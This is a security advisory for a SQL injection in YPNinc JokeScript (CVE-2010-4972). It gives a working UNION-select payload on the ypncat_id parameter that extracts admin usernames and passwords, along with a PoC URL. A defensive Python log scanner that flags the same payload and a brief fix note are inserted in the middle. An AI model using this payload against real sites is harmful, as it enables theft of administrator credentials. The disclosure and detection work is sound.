Bug: YPNinc JokeScript SQL Injection ( Ascii Version )

YPNinc JokeScript SQL Injection

Published : 2011.11.04
Credit : v3n0m
Risk : High
CWE : CWE-89
CVE : CVE-2010-4972
Local : No
Remote : Yes

CVSS Base Score : 7.5/10
Impact Subscore : 6.4/10
Exploitability Subscore : 10/10
Exploit range : Remote
Attack complexity : Low
Authentication : Not required
Confidentiality impact : Partial
Integrity impact : Partial
Availability impact : Partial

-----------------------------------------------------------------------
YPNinc JokeScript (ypncat_id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : June, 29-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : JokeScript
Vendor : http://www.ypninc.com/
Price : $89.95
----------------------------------------------------------------

Exploit:
~~~~~~~
-999+union+all+select+1,2,3,4,group_concat(ypnadmin_name,char(58),ypnadmin_pwd)v3n0m,6,7,8,9,10+from+ypnjks_admin--

Poc:
~~~~~~~

http://127.0.0.1/[path]/index.php?ypncat_id=[SQLi]

----------------------------------------------------------------

WWW.YOGYACARDERLINK.WEB.ID | v3n0m666[at]live[dot]com

---------------------------[EOF]--------------------------------
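
A defender-side check for the ypncat_id injection reported above, as an added example that is not part of the original advisory or the vendor's code: it scans web access logs for ypncat_id values that are not plain integers. It assumes ypncat_id is a numeric category id and that logs are in combined format; the log lines and the /jokes/ path are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: ypncat_id is a numeric category id, so legitimate values are digits only.
NUMERIC_ID = re.compile(r"[0-9]{1,10}")
# Keywords typical of UNION-based extraction; used only to grade the finding.
SQL_TOKENS = re.compile(r"\b(union|select|from|group_concat|information_schema)\b", re.I)
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
RANK = {"ok": 0, "malformed": 1, "sqli": 2}

def classify_id(value):
    """Return 'ok', 'malformed' or 'sqli' for one decoded ypncat_id value."""
    if NUMERIC_ID.fullmatch(value):
        return "ok"
    return "sqli" if SQL_TOKENS.search(value) else "malformed"

def scan_line(line):
    """Return (verdict, value) for a log line, or None if ypncat_id is absent."""
    m = REQUEST.search(line)
    if not m:
        return None
    # parse_qs decodes %xx and '+', so encoded payloads are judged in clear form.
    values = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True).get("ypncat_id")
    if not values:
        return None
    # If the parameter is repeated, report the worst value seen.
    worst = max(values, key=lambda v: RANK[classify_id(v)])
    return classify_id(worst), worst

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /jokes/index.php?ypncat_id=12 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /jokes/index.php?ypncat_id=-999+union+all+select+1,2 HTTP/1.1" 200 880',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /jokes/index.php?ypncat_id=3%27 HTTP/1.1" 500 0',
    '192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /jokes/about.php HTTP/1.1" 200 900',
]

def scan(lines):
    """Return [(line_number, verdict, value)] for every non-'ok' ypncat_id."""
    hits = []
    for n, line in enumerate(lines, 1):
        result = scan_line(line)
        if result and result[0] != "ok":
            hits.append((n, result[0], result[1]))
    return hits

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The same digits-only rule, applied to ypncat_id before it reaches the query, is the input-validation half of the fix; the other half is a parameterized query.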

References:

http://xforce.iss.net/xforce/xfdb/59893
http://www.vupen.com/english/advisories/2010/1647
http://www.securityfocus.com/bid/41215
http://www.exploit-db.com/exploits/14107
http://secunia.com/advisories/40378
http://packetstormsecurity.org/1006-exploits/ypnincjokescript-sql.txt

Copyright 2014, cxsecurity.com